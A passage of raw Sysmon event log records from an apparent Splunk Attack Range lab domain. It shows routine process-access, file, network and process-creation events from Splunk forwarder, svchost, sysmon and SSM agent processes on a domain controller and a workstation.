Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:23.260{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3604B46A85E9FE4B9C0275177DEF69AC,SHA256=C13067D0B1BBCB89A94A91FFF7E1E6A798A94A9EB419A511249151EC8E595162,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:19.438{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58410-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:19.376{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51170-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:23.378{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F888E66AB54572B29E95DEE56D13F36,SHA256=ADBFC49CE2DCA0AF335ACFDB4AE115F72F16535A95855903955F57C76E84A3FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:22.918{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53308-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:24.344{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99172452742A226DB507AC3D77A28326,SHA256=8377051F9CAC1850A28DC559370AE6461CD047FFDF9651815354CD4CE94F01D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:24.394{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EFBBFA6E08131639796554E5F85F8B,SHA256=19A2E4F5691401CAEE994D1A1CDAB00074FF709F56DA839E49BF6C643D835F33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A09-6151-AB79-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A09-6151-AB79-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.925{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A09-6151-AB79-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.910{69CF5F33-8A09-6151-AB79-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:22.430{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53142-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:25.410{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DA47943D9C44C769094DE6F1376EF6,SHA256=5BDC063FDDAE83DBF3B9444FF138EADC9DF96698B6CC9C2163524EE09401879D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:24.003{5EBD8912-7F42-614D-4400-00000000FC01}3648C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53312-false169.254.169.254-80http 354300x80000000000000001049470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:23.879{5EBD8912-7F42-614D-4400-00000000FC01}3648C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53311-false169.254.169.254-80http 354300x80000000000000001049469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:23.820{5EBD8912-7F42-614D-4400-00000000FC01}3648C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53310-false169.254.169.254-80http 354300x80000000000000001049468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:23.819{5EBD8912-7F42-614D-4400-00000000FC01}3648C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53309-false169.254.169.254-80http 23542300x80000000000000001049467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:25.363{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F542747F77E712C0B76E0D0A116660ED,SHA256=7646BDBC5FE60EFA876ECD314B005B585E5C6BA5B66EFFB960A64C2250C380F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.753{69CF5F33-8A0A-6151-AC79-00000000FD01}344496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A0A-6151-AC79-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:26.550{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 